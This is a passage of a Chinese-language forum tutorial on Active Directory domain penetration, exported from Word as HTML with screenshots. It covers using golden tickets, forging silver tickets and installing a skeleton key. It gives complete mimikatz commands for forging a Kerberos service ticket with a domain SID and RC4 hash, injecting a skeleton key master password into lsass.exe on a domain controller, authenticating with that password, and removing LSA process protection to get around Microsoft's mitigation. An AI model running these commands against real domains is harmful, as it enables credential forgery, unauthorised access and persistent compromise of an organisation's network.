                        使用<span lang="EN-US"> klist </span>查看本地缓存的票据<span lang="EN-US"></span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <img width="556" height="352" src="https://www.2k8.org/content/uploadfile/202203/17/851b90f0.png" alt="" style="vertical-align:middle;" />
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        获得票据后可直接通过<span lang="EN-US">dir </span>远程访问主机,可以直接使用<span lang="EN-US">ipc </span>进行连接:<span lang="EN-US"></span>
                </p>
        </div>
<span lang="EN-US" style="font-family:等线;font-size:10.5pt;"><br clear="all" style="page-break-before:always;" />
</span>
        <div style="page:WordSection37;">
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <img width="556" height="359" src="https://www.2k8.org/content/uploadfile/202203/17/db751dff.png" alt="" style="vertical-align:middle;" />
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.5pt;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-size:12.0pt;">&nbsp;</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:2.6pt;punctuation-wrap:simple;text-autospace:none;">
                        <!--><o:wrapblock><v:rect id="_x0000_s1061" style="position:absolute;left:0;text-align:left;margin-left:90pt;margin-top:23.05pt;width:414pt;height:333pt;z-index:251692032;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text;" o:allowincell="f" filled="f" stroked="f">   <v:textbox inset="0,0,0,0">    <!>
                        <table cellpadding="0" cellspacing="0" width="100%">
                                <tr>
                                        <td>
                                                <div>
                                                        <p class="MsoNormal" style="line-height:333.0pt;mso-pagination:widow-orphan;mso-layout-grid-align:auto;text-autospace:ideograph-numeric ideograph-other;">
                                                                <span lang="EN-US" style="font-size:12.0pt;font-family:&quot;mso-fareast-font-family:等线;mso-fareast-theme-font:minor-fareast;"><vshape id="_x0000_i1090" type="#_x0000_t75" style="width:414.5pt;height:333pt;">       <vimagedata src="file://C:/Users/86137/AppData/Local/Temp/msohtmlclip1/01/clip_image128.png" o:title="" />      </vshape></span>
                                                        </p>
                                                        <p class="MsoNormal">
                                                                <span lang="EN-US" style="font-size:12.0pt;font-family:&quot;mso-fareast-font-family:等线;mso-fareast-theme-font:minor-fareast;">&nbsp;</span>
                                                        </p>
                                                </div>
<!>
                                        </td>
                                </tr>
                        </table>
</v:textbox>   <w:wrap type="topAndBottom" anchorx="page" /></v:rect><!--><span>
                        <table cellpadding="0" cellspacing="0">
                                <tbody>
                                        <tr>
                                                <td width="180" height="0">
                                                </td>
                                        </tr>
                                        <tr>
                                                <td>
                                                </td>
                                                <td>
                                                        <img width="555" height="3" src="https://www.2k8.org/content/uploadfile/202203/17/b643f7cc.png" alt=": " style="vertical-align:middle;" />
                                                </td>
                                        </tr>
                                </tbody>
                        </table>
</span><br clear="ALL" />
当然也可以使用<span lang="EN-US">psexec </span>去获得一个<span lang="EN-US"> cmdshell</span>:<span lang="EN-US"></span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.2pt;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-size:13.0pt;">&nbsp;</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        注:普通黄金票据不能跨域使用;<span lang="EN-US">TGT </span>有效时间为<span lang="EN-US"> 20 </span>分钟;。<span lang="EN-US"></span>
                </p>
        </div>
<span lang="EN-US" style="font-family:等线;font-size:10.5pt;"><br clear="all" style="page-break-before:always;" />
</span>
        <div style="page:WordSection38;">
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-size:10.0pt;">&nbsp;</span>
                </p>
                <h3 style="margin-top:9.2pt;punctuation-wrap:simple;tab-stops:34.1pt;">
                        <a name="5.2 白银票据"></a><span lang="EN-US"><span>5.2<span style="font:7.0pt &quot;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </span></span></span>白银票据<span lang="EN-US"></span>
                </h3>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-family:等线 Light;font-size:11.0pt;">&nbsp;</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:15.7pt;margin-bottom:0cm;margin-left:27.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        黄金票据是伪造<span lang="EN-US"> TGT</span>,白银票据(<span lang="EN-US">Silver Tickets</span>)是伪造<span lang="EN-US"> ST(Service Ticket)</span>,因为<span lang="EN-US"> TGT </span>在<span lang="EN-US"></span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:15.7pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US">pac </span>里面限定了给<span lang="EN-US">Client </span>授权的服务,所以银票只能访问指定的服务。<span lang="EN-US"></span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-size:11.0pt;">&nbsp;</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.35pt;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-size:10.0pt;">&nbsp;</span>
                </p>
                <h3 style="margin-left:46.2pt;punctuation-wrap:simple;tab-stops:46.25pt;text-indent:-40.25pt;">
                        <a name="5.2.1 伪造白银票据的前提条件"></a><span lang="EN-US" style="font-family:等线;letter-spacing:-.05pt;"><span>5.2.1<span style="font:7.0pt &quot;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </span></span></span><span style="font-family:等线;">伪造白银票据的前提条件<span lang="EN-US"></span></span>
                </h3>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.65pt;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US">&nbsp;</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:15.7pt;margin-bottom:0cm;margin-left:27.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US">1</span>、域名称<span lang="EN-US"></span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:15.6pt;margin-bottom:0cm;margin-left:27.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US">2</span>、域的<span lang="EN-US">SID</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:15.6pt;margin-bottom:0cm;margin-left:27.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US">3</span>、域的服务账号的密码<span lang="EN-US"> hash</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:15.7pt;margin-bottom:0cm;margin-left:27.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US">4</span>、伪造的用户名(可以是任意的)<span lang="EN-US"></span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.55pt;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US">&nbsp;</span>
                </p>
                <h3 style="margin-left:46.2pt;punctuation-wrap:simple;tab-stops:46.25pt;text-indent:-40.25pt;">
                        <a name="5.2.2 白银票据的利用"></a><span lang="EN-US" style="font-family:等线;letter-spacing:-.05pt;"><span>5.2.2<span style="font:7.0pt &quot;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </span></span></span><span style="font-family:等线;">白银票据的利用<span lang="EN-US"></span></span>
                </h3>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-size:11.0pt;">&nbsp;</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:15.7pt;margin-bottom:0cm;margin-left:27.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        在黄金票据中我们可以不指定<span lang="EN-US"> target </span>和<span lang="EN-US"> service</span>,但是在白银票据中必须指定<span lang="EN-US"> target </span>和<span lang="EN-US"></span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:15.6pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US">service</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:98%;margin-bottom:0cm;margin-left:6.0pt;margin-right:47.25pt;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US">mimikatz.exe privilege::debug "kerberos::golden /domain:adtest.com /sid:S-1-5-21- 3418659180-3421952656-1938706522 /target:WIN-9P499QKTLDO.ADTEST.COM</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:15.6pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <!--><o:wrapblock><v:rect id="_x0000_s1062" style="position:absolute;left:0;text-align:left;margin-left:90pt;margin-top:18.8pt;width:412pt;height:303pt;z-index:251693056;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text;" o:allowincell="f" filled="f" stroked="f">   <v:textbox inset="0,0,0,0">    <!>
                        <table cellpadding="0" cellspacing="0" width="100%">
                                <tr>
                                        <td>
                                                <div>
                                                        <p class="MsoNormal" style="line-height:303.0pt;mso-pagination:widow-orphan;mso-layout-grid-align:auto;text-autospace:ideograph-numeric ideograph-other;">
                                                                <span lang="EN-US" style="font-size:12.0pt;font-family:&quot;mso-fareast-font-family:等线;mso-fareast-theme-font:minor-fareast;"><vshape id="_x0000_i1091" type="#_x0000_t75" style="width:412.5pt;height:303pt;">       <vimagedata src="file://C:/Users/86137/AppData/Local/Temp/msohtmlclip1/01/clip_image129.png" o:title="" />      </vshape></span>
                                                        </p>
                                                        <p class="MsoNormal">
                                                                <span lang="EN-US" style="font-size:12.0pt;font-family:&quot;mso-fareast-font-family:等线;mso-fareast-theme-font:minor-fareast;">&nbsp;</span>
                                                        </p>
                                                </div>
<!>
                                        </td>
                                </tr>
                        </table>
</v:textbox>   <w:wrap type="topAndBottom" anchorx="page" /></v:rect><!--><span>
                        <table cellpadding="0" cellspacing="0">
                                <tbody>
                                        <tr>
                                                <td width="180" height="0">
                                                </td>
                                        </tr>
                                        <tr>
                                                <td>
                                                </td>
                                                <td>
                                                        <img width="552" height="3" src="https://www.2k8.org/content/uploadfile/202203/17/1f6431d6.png" alt=": " style="vertical-align:middle;" />
                                                </td>
                                        </tr>
                                </tbody>
                        </table>
</span><br clear="ALL" />
<span lang="EN-US">/service:cifs /rc4:22eec3fbe7191bdcf1e5819f8bdcd951 /user:aaa /ptt"</span>
                </p>
        </div>
<span lang="EN-US" style="font-family:等线;font-size:10.5pt;"><br clear="all" style="page-break-before:always;" />
</span>
        <div style="page:WordSection39;">
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <img width="553" height="706" src="https://www.2k8.org/content/uploadfile/202203/17/ea4b6a5c.png" alt="" style="vertical-align:middle;" />
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-size:10.0pt;">&nbsp;</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-size:10.0pt;">&nbsp;</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.45pt;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-size:6.0pt;">&nbsp;</span>
                </p>
                <h3 style="margin-bottom:.0001pt;margin-left:30.5pt;margin-right:0cm;margin-top:1.3pt;punctuation-wrap:simple;tab-stops:30.5pt;text-indent:-24.5pt;">
                        <a name="5.3 skeleton key"></a><span lang="EN-US"><span>5.3<span style="font:7.0pt &quot;">&nbsp;&nbsp; </span></span></span><span lang="EN-US">skeleton key</span>
                </h3>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.05pt;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-family:等线 Light;font-size:11.0pt;">&nbsp;</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:98%;margin-bottom:.0001pt;margin-left:6.0pt;margin-right:13.3pt;margin-top:.05pt;punctuation-wrap:simple;text-autospace:none;text-indent:20.95pt;">
                        <span lang="EN-US">skeleton key</span>(万能钥匙)就是给所有域内用户添加一个相同的密码,域内所有的用户都可以使用这个密码进行认证,同时原始密码也可以使用,其原理是对<span lang="EN-US">lsass.exe<span>&nbsp; </span></span>进行注入,所以重启后会失效。<span lang="EN-US"></span>
                </p>
        </div>
<span lang="EN-US" style="font-family:等线;font-size:10.5pt;line-height:98%;"><br clear="all" style="page-break-before:always;" />
</span>
        <div style="page:WordSection40;">
                <p style="font-family:等线;font-size:10.5pt;line-height:15.7pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:2.05pt;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US">1</span>、 在域控上安装<span lang="EN-US">skeleton key</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:15.7pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <!--><o:wrapblock><v:rect id="_x0000_s1063" style="position:absolute;left:0;text-align:left;margin-left:90pt;margin-top:17.3pt;width:415pt;height:245pt;z-index:251694080;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text;" o:allowincell="f" filled="f" stroked="f">   <v:textbox inset="0,0,0,0">    <!>
                        <table cellpadding="0" cellspacing="0" width="100%">
                                <tr>
                                        <td>
                                                <div>
                                                        <p class="MsoNormal" style="line-height:245.0pt;mso-pagination:widow-orphan;mso-layout-grid-align:auto;text-autospace:ideograph-numeric ideograph-other;">
                                                                <span lang="EN-US" style="font-size:12.0pt;font-family:&quot;mso-fareast-font-family:等线;mso-fareast-theme-font:minor-fareast;"><vshape id="_x0000_i1092" type="#_x0000_t75" style="width:415pt;height:245pt;">       <vimagedata src="file://C:/Users/86137/AppData/Local/Temp/msohtmlclip1/01/clip_image132.png" o:title="" />      </vshape></span>
                                                        </p>
                                                        <p class="MsoNormal">
                                                                <span lang="EN-US" style="font-size:12.0pt;font-family:&quot;mso-fareast-font-family:等线;mso-fareast-theme-font:minor-fareast;">&nbsp;</span>
                                                        </p>
                                                </div>
<!>
                                        </td>
                                </tr>
                        </table>
</v:textbox>   <w:wrap type="topAndBottom" anchorx="page" /></v:rect><!--><span>
                        <table cellpadding="0" cellspacing="0">
                                <tbody>
                                        <tr>
                                                <td width="180" height="0">
                                                </td>
                                        </tr>
                                        <tr>
                                                <td>
                                                </td>
                                                <td>
                                                        <img width="556" height="3" src="https://www.2k8.org/content/uploadfile/202203/17/c40634bc.png" alt=": " style="vertical-align:middle;" />
                                                </td>
                                        </tr>
                                </tbody>
                        </table>
</span><br clear="ALL" />
<span lang="EN-US">mimikatz.exe privilege::debug "misc::skeleton"</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.3pt;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-size:11.0pt;">&nbsp;</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:98%;margin-bottom:.0001pt;margin-left:24.0pt;margin-right:176.7pt;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;text-indent:-18.0pt;">
                        <span lang="EN-US">2</span>、 在域内其他机器尝试使用<span lang="EN-US"> skeleton key </span>去访问域控添加的密码是<span lang="EN-US"> mimikatz</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:98%;margin-bottom:0cm;margin-left:6.0pt;margin-right:32.7pt;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US">C:\Users\jeff1&gt;net use \\WIN-9P499QKTLDO.adtest.com\c$ mimikatz /user:adtest\adm inistrator</span>
                </p>
        </div>
<span lang="EN-US" style="font-family:等线;font-size:10.5pt;line-height:98%;"><br clear="all" style="page-break-before:always;" />
</span>
        <div style="page:WordSection41;">
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <img width="557" height="538" src="https://www.2k8.org/content/uploadfile/202203/17/706eadf8.png" alt="" style="vertical-align:middle;" />
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.25pt;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-size:8.5pt;">&nbsp;</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:98%;margin-bottom:.0001pt;margin-left:24.0pt;margin-right:25.3pt;margin-top:2.7pt;punctuation-wrap:simple;text-autospace:none;text-indent:-18.0pt;">
                        <span lang="EN-US">3</span>、 微软在<span lang="EN-US"> 2014 </span>年<span lang="EN-US"> 3 </span>月<span lang="EN-US"> 12 </span>日添加了<span lang="EN-US"> LSA </span>爆护策略,用来防止对进程<span lang="EN-US">lsass.exe </span>的代码注入。如果直接尝试添加<span lang="EN-US">skelenton key </span>会失败。<span lang="EN-US"></span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.35pt;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-size:10.0pt;">&nbsp;</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:15.7pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        适用系统:<span lang="EN-US"></span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:15.6pt;margin-bottom:0cm;margin-left:27.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US">windows 8.1</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:15.7pt;margin-bottom:0cm;margin-left:27.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US">windows server 2012 </span>及以上<span lang="EN-US"></span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.7pt;punctuation-wrap:simple;text-autospace:none;">
                        <!--><o:wrapblock><v:rect id="_x0000_s1064" style="position:absolute;margin-left:90pt;margin-top:15.45pt;width:413pt;height:139pt;z-index:251695104;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text;" o:allowincell="f" filled="f" stroked="f">   <v:textbox inset="0,0,0,0">    <!>
                        <table cellpadding="0" cellspacing="0" width="100%">
                                <tr>
                                        <td>
                                                <div>
                                                        <p class="MsoNormal" style="line-height:139.0pt;mso-pagination:widow-orphan;mso-layout-grid-align:auto;text-autospace:ideograph-numeric ideograph-other;">
                                                                <span lang="EN-US" style="font-size:12.0pt;font-family:&quot;mso-fareast-font-family:等线;mso-fareast-theme-font:minor-fareast;"><vshape id="_x0000_i1093" type="#_x0000_t75" style="width:412.5pt;height:139pt;">       <vimagedata src="file://C:/Users/86137/AppData/Local/Temp/msohtmlclip1/01/clip_image135.jpg" o:title="" />      </vshape></span>
                                                        </p>
                                                        <p class="MsoNormal">
                                                                <span lang="EN-US" style="font-size:12.0pt;font-family:&quot;mso-fareast-font-family:等线;mso-fareast-theme-font:minor-fareast;">&nbsp;</span>
                                                        </p>
                                                </div>
<!>
                                        </td>
                                </tr>
                        </table>
</v:textbox>   <w:wrap type="topAndBottom" anchorx="page" /></v:rect><!--><span>
                        <table cellpadding="0" cellspacing="0" align="left">
                                <tbody>
                                        <tr>
                                                <td width="180" height="0">
                                                </td>
                                        </tr>
                                        <tr>
                                                <td>
                                                </td>
                                                <td>
                                                        <img width="553" height="3" src="https://www.2k8.org/content/uploadfile/202203/17/eac8cdc5.png" alt=": " style="vertical-align:middle;" />
                                                </td>
                                        </tr>
                                </tbody>
                        </table>
</span><br clear="ALL" />
<span lang="EN-US" style="font-size:8.5pt;"></span>
                </p>
        </div>
<span lang="EN-US" style="font-family:等线;font-size:8.5pt;"><br clear="all" style="page-break-before:always;" />
</span>
        <p style="font-family:等线;font-size:10.5pt;line-height:15.7pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:2.05pt;punctuation-wrap:simple;text-autospace:none;">
                当然<span lang="EN-US"> mimikatz </span>依旧可以绕过,命令如下:<span lang="EN-US"></span>
        </p>
        <p style="font-family:等线;font-size:10.5pt;line-height:15.6pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                <span lang="EN-US">privilege::debug</span>
        </p>
        <p style="font-family:等线;font-size:10.5pt;line-height:15.6pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                <span lang="EN-US">!+</span>
        </p>
        <p style="font-family:等线;font-size:10.5pt;line-height:98%;margin-bottom:0cm;margin-left:6.0pt;margin-right:233.3pt;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                <span lang="EN-US">!processprotect /process:lsass.exe /remove misc::skeleton</span>
        </p>
        <p>
                <br />
        </p>
</div>
页: [1]
查看完整版本: 域渗透技能大全